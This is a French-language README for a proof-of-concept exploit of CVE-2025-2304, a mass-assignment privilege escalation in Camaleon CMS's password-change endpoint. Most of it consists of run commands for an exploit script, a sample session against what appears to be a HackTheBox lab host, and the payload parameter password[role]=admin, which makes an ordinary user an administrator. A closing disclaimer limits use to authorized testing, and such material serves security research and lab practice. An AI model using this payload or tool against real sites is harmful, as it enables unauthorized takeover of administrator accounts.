
PoC pour l'élévation de privilèges CVE-2025-2304 dans le CMS Camaleon
Camaleon CMS vulnérable à une élévation de privilèges via une assignation massive (Mass Assignment)
Une élévation de privilèges via une assignation massive (Mass Assignment) existe dans Camaleon CMS
Lorsqu'un utilisateur souhaite changer son mot de passe, la méthode 'updated_ajax' du UsersController est appelée. La vulnérabilité provient de l'utilisation de la méthode dangereuse permit!, qui permet à tous les paramètres de passer sans aucun filtrage.
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - URL de base de l'application vulnérable-u - Nom d'utilisateur pour l'authentification-p - Mot de passe pour l'authentificationpython exploit.py --url http://facts.htb -u krrish -p krrish
Résultat :
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=adminCet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal.